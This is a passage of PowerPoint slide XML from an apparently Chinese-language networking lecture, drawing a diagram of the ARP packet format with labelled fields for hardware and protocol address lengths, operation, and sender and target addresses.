              <a:gd name="T12" fmla="*/ 248932 w 2141984"/>
              <a:gd name="T13" fmla="*/ 190863 h 463319"/>
              <a:gd name="T14" fmla="*/ 246303 w 2141984"/>
              <a:gd name="T15" fmla="*/ 217856 h 463319"/>
              <a:gd name="T16" fmla="*/ 239957 w 2141984"/>
              <a:gd name="T17" fmla="*/ 229038 h 463319"/>
              <a:gd name="T18" fmla="*/ 8974 w 2141984"/>
              <a:gd name="T19" fmla="*/ 229038 h 463319"/>
              <a:gd name="T20" fmla="*/ 2628 w 2141984"/>
              <a:gd name="T21" fmla="*/ 217856 h 463319"/>
              <a:gd name="T22" fmla="*/ 1 w 2141984"/>
              <a:gd name="T23" fmla="*/ 190862 h 463319"/>
              <a:gd name="T24" fmla="*/ 0 w 2141984"/>
              <a:gd name="T25" fmla="*/ 38174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E1E01E"/>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b="1">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>硬件地址长度</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(n)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24581" name="Freeform 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1000125" y="3284538"/>
            <a:ext cx="7175500" cy="463550"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2141984"/>
              <a:gd name="T1" fmla="*/ 77611 h 463319"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 2141984"/>
              <a:gd name="T3" fmla="*/ 22728 h 463319"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 2141984"/>
              <a:gd name="T5" fmla="*/ 1 h 463319"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 2141984"/>
              <a:gd name="T7" fmla="*/ 0 h 463319"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 2141984"/>
              <a:gd name="T9" fmla="*/ 22728 h 463319"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 2141984"/>
              <a:gd name="T11" fmla="*/ 77612 h 463319"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 2141984"/>
              <a:gd name="T13" fmla="*/ 388028 h 463319"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 2141984"/>
              <a:gd name="T15" fmla="*/ 442904 h 463319"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 2141984"/>
              <a:gd name="T17" fmla="*/ 465634 h 463319"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 2141984"/>
              <a:gd name="T19" fmla="*/ 465634 h 463319"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 2141984"/>
              <a:gd name="T21" fmla="*/ 442903 h 463319"/>
              <a:gd name="T22" fmla="*/ 156917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62D025"/>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发送方硬件地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>字节</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24582" name="Freeform 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1000125" y="3794125"/>
            <a:ext cx="7175500" cy="463550"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2141984"/>
              <a:gd name="T1" fmla="*/ 77611 h 463319"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 2141984"/>
              <a:gd name="T3" fmla="*/ 22728 h 463319"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 2141984"/>
              <a:gd name="T5" fmla="*/ 1 h 463319"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 2141984"/>
              <a:gd name="T7" fmla="*/ 0 h 463319"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 2141984"/>
              <a:gd name="T9" fmla="*/ 22728 h 463319"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 2141984"/>
              <a:gd name="T11" fmla="*/ 77612 h 463319"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 2141984"/>
              <a:gd name="T13" fmla="*/ 388028 h 463319"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 2141984"/>
              <a:gd name="T15" fmla="*/ 442904 h 463319"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 2141984"/>
              <a:gd name="T17" fmla="*/ 465634 h 463319"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 2141984"/>
              <a:gd name="T19" fmla="*/ 465634 h 463319"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 2141984"/>
              <a:gd name="T21" fmla="*/ 442903 h 463319"/>
              <a:gd name="T22" fmla="*/ 156917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2DBE56"/>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发送方协议地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>字节</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24583" name="Freeform 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1000125" y="4303713"/>
            <a:ext cx="7175500" cy="463550"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2141984"/>
              <a:gd name="T1" fmla="*/ 77611 h 463319"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 2141984"/>
              <a:gd name="T3" fmla="*/ 22728 h 463319"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 2141984"/>
              <a:gd name="T5" fmla="*/ 1 h 463319"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 2141984"/>
              <a:gd name="T7" fmla="*/ 0 h 463319"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 2141984"/>
              <a:gd name="T9" fmla="*/ 22728 h 463319"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 2141984"/>
              <a:gd name="T11" fmla="*/ 77612 h 463319"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 2141984"/>
              <a:gd name="T13" fmla="*/ 388028 h 463319"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 2141984"/>
              <a:gd name="T15" fmla="*/ 442904 h 463319"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 2141984"/>
              <a:gd name="T17" fmla="*/ 465634 h 463319"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 2141984"/>
              <a:gd name="T19" fmla="*/ 465634 h 463319"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 2141984"/>
              <a:gd name="T21" fmla="*/ 442903 h 463319"/>
              <a:gd name="T22" fmla="*/ 156917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32AEA5"/>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目的方硬件地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>字节</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24584" name="Freeform 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1000125" y="4813300"/>
            <a:ext cx="7175500" cy="463550"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2141984"/>
              <a:gd name="T1" fmla="*/ 77611 h 463319"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 2141984"/>
              <a:gd name="T3" fmla="*/ 22728 h 463319"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 2141984"/>
              <a:gd name="T5" fmla="*/ 1 h 463319"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 2141984"/>
              <a:gd name="T7" fmla="*/ 0 h 463319"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 2141984"/>
              <a:gd name="T9" fmla="*/ 22728 h 463319"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 2141984"/>
              <a:gd name="T11" fmla="*/ 77612 h 463319"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 2141984"/>
              <a:gd name="T13" fmla="*/ 388028 h 463319"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 2141984"/>
              <a:gd name="T15" fmla="*/ 442904 h 463319"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 2141984"/>
              <a:gd name="T17" fmla="*/ 465634 h 463319"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 2141984"/>
              <a:gd name="T19" fmla="*/ 465634 h 463319"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 2141984"/>
              <a:gd name="T21" fmla="*/ 442903 h 463319"/>
              <a:gd name="T22" fmla="*/ 156917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39639E"/>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目的方协议地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>字节</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24585" name="Freeform 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2800350" y="2781300"/>
            <a:ext cx="1727200" cy="431800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2141984"/>
              <a:gd name="T1" fmla="*/ 38174 h 463319"/>
              <a:gd name="T2" fmla="*/ 2628 w 2141984"/>
              <a:gd name="T3" fmla="*/ 11180 h 463319"/>
              <a:gd name="T4" fmla="*/ 8974 w 2141984"/>
              <a:gd name="T5" fmla="*/ 1 h 463319"/>
              <a:gd name="T6" fmla="*/ 239958 w 2141984"/>
              <a:gd name="T7" fmla="*/ 0 h 463319"/>
              <a:gd name="T8" fmla="*/ 246303 w 2141984"/>
              <a:gd name="T9" fmla="*/ 11180 h 463319"/>
              <a:gd name="T10" fmla="*/ 248931 w 2141984"/>
              <a:gd name="T11" fmla="*/ 38174 h 463319"/>
              <a:gd name="T12" fmla="*/ 248932 w 2141984"/>
              <a:gd name="T13" fmla="*/ 190863 h 463319"/>
              <a:gd name="T14" fmla="*/ 246303 w 2141984"/>
              <a:gd name="T15" fmla="*/ 217856 h 463319"/>
              <a:gd name="T16" fmla="*/ 239957 w 2141984"/>
              <a:gd name="T17" fmla="*/ 229038 h 463319"/>
              <a:gd name="T18" fmla="*/ 8974 w 2141984"/>
              <a:gd name="T19" fmla="*/ 229038 h 463319"/>
              <a:gd name="T20" fmla="*/ 2628 w 2141984"/>
              <a:gd name="T21" fmla="*/ 217856 h 463319"/>
              <a:gd name="T22" fmla="*/ 1 w 2141984"/>
              <a:gd name="T23" fmla="*/ 190862 h 463319"/>
              <a:gd name="T24" fmla="*/ 0 w 2141984"/>
              <a:gd name="T25" fmla="*/ 38174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E1E01E"/>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b="1">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>协议地址长度</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(m)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24586" name="Freeform 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4600575" y="2276475"/>
            <a:ext cx="3527425" cy="463550"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2141984"/>
              <a:gd name="T1" fmla="*/ 77611 h 463319"/>
              <a:gd name="T2" fmla="*/ 3317913 w 2141984"/>
              <a:gd name="T3" fmla="*/ 22728 h 463319"/>
              <a:gd name="T4" fmla="*/ 11328031 w 2141984"/>
              <a:gd name="T5" fmla="*/ 1 h 463319"/>
              <a:gd name="T6" fmla="*/ 302889610 w 2141984"/>
              <a:gd name="T7" fmla="*/ 0 h 463319"/>
              <a:gd name="T8" fmla="*/ 310899654 w 2141984"/>
              <a:gd name="T9" fmla="*/ 22728 h 463319"/>
              <a:gd name="T10" fmla="*/ 314217499 w 2141984"/>
              <a:gd name="T11" fmla="*/ 77612 h 463319"/>
              <a:gd name="T12" fmla="*/ 314217710 w 2141984"/>
              <a:gd name="T13" fmla="*/ 388028 h 463319"/>
              <a:gd name="T14" fmla="*/ 310899654 w 2141984"/>
              <a:gd name="T15" fmla="*/ 442904 h 463319"/>
              <a:gd name="T16" fmla="*/ 302889610 w 2141984"/>
              <a:gd name="T17" fmla="*/ 465634 h 463319"/>
              <a:gd name="T18" fmla="*/ 11327972 w 2141984"/>
              <a:gd name="T19" fmla="*/ 465634 h 463319"/>
              <a:gd name="T20" fmla="*/ 3317913 w 2141984"/>
              <a:gd name="T21" fmla="*/ 442903 h 463319"/>
              <a:gd name="T22" fmla="*/ 158 w 2141984"/>
              <a:gd name="T23" fmla="*/ 388027 h 463319"/>
              <a:gd name="T24" fmla="*/ 0 w 2141984"/>
              <a:gd name="T25" fmla="*/ 77611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EB641B"/>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a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>协议类型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24587" name="Freeform 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4600575" y="2781300"/>
            <a:ext cx="3527425" cy="431800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2141984"/>
              <a:gd name="T1" fmla="*/ 38174 h 463319"/>
              <a:gd name="T2" fmla="*/ 3317913 w 2141984"/>
              <a:gd name="T3" fmla="*/ 11180 h 463319"/>
              <a:gd name="T4" fmla="*/ 11328031 w 2141984"/>
              <a:gd name="T5" fmla="*/ 1 h 463319"/>
              <a:gd name="T6" fmla="*/ 302889610 w 2141984"/>
              <a:gd name="T7" fmla="*/ 0 h 463319"/>
              <a:gd name="T8" fmla="*/ 310899654 w 2141984"/>
              <a:gd name="T9" fmla="*/ 11180 h 463319"/>
              <a:gd name="T10" fmla="*/ 314217499 w 2141984"/>
              <a:gd name="T11" fmla="*/ 38174 h 463319"/>
              <a:gd name="T12" fmla="*/ 314217710 w 2141984"/>
              <a:gd name="T13" fmla="*/ 190863 h 463319"/>
              <a:gd name="T14" fmla="*/ 310899654 w 2141984"/>
              <a:gd name="T15" fmla="*/ 217856 h 463319"/>
              <a:gd name="T16" fmla="*/ 302889610 w 2141984"/>
              <a:gd name="T17" fmla="*/ 229038 h 463319"/>
              <a:gd name="T18" fmla="*/ 11327972 w 2141984"/>
              <a:gd name="T19" fmla="*/ 229038 h 463319"/>
              <a:gd name="T20" fmla="*/ 3317913 w 2141984"/>
              <a:gd name="T21" fmla="*/ 217856 h 463319"/>
              <a:gd name="T22" fmla="*/ 158 w 2141984"/>
              <a:gd name="T23" fmla="*/ 190862 h 463319"/>
              <a:gd name="T24" fmla="*/ 0 w 2141984"/>
              <a:gd name="T25" fmla="*/ 38174 h 463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984"/>
              <a:gd name="T40" fmla="*/ 0 h 463319"/>
              <a:gd name="T41" fmla="*/ 2141984 w 2141984"/>
              <a:gd name="T42" fmla="*/ 463319 h 463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984" h="463319">
                <a:moveTo>
                  <a:pt x="0" y="77221"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="56741"/>
                  <a:pt x="8136" y="37099"/>
                  <a:pt x="22618" y="22618"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="37100" y="8136"/>
                  <a:pt x="56741" y="1"/>
                  <a:pt x="77222" y="1"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2064763" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2085243" y="0"/>
                  <a:pt x="2104885" y="8136"/>
                  <a:pt x="2119366" y="22618"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2133848" y="37100"/>
                  <a:pt x="2141983" y="56741"/>
                  <a:pt x="2141983" y="77222"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2141983" y="180181"/>
                  <a:pt x="2141984" y="283139"/>
                  <a:pt x="2141984" y="386098"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2141984" y="406578"/>
                  <a:pt x="2133848" y="426220"/>
                  <a:pt x="2119366" y="440702"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2104884" y="455184"/>
                  <a:pt x="2085243" y="463320"/>
                  <a:pt x="2064762" y="463319"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="77221" y="463319"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="56741" y="463319"/>
                  <a:pt x="37099" y="455183"/>
                  <a:pt x="22618" y="440701"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8136" y="426219"/>
                  <a:pt x="1" y="406578"/>
                  <a:pt x="1" y="386097"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1" y="283138"/>
                  <a:pt x="0" y="180180"/>
                  <a:pt x="0" y="77221"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="E1E01E"/>
          </a:solidFill>
          <a:ln w="63500" cmpd="thickThin">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:bevel/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="83577" tIns="83577" rIns="83577" bIns="83577"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600" b="1">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>操作</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1">
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24588" name="TextBox 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="855663" y="1917700"/>
            <a:ext cx="330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0</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4589" name="TextBox 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4167188" y="1917700"/>
            <a:ext cx="476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15</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4590" name="TextBox 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7767638" y="1844675"/>
            <a:ext cx="47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31</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37904" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7308850" y="2781300"/>
            <a:ext cx="2051050" cy="461963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
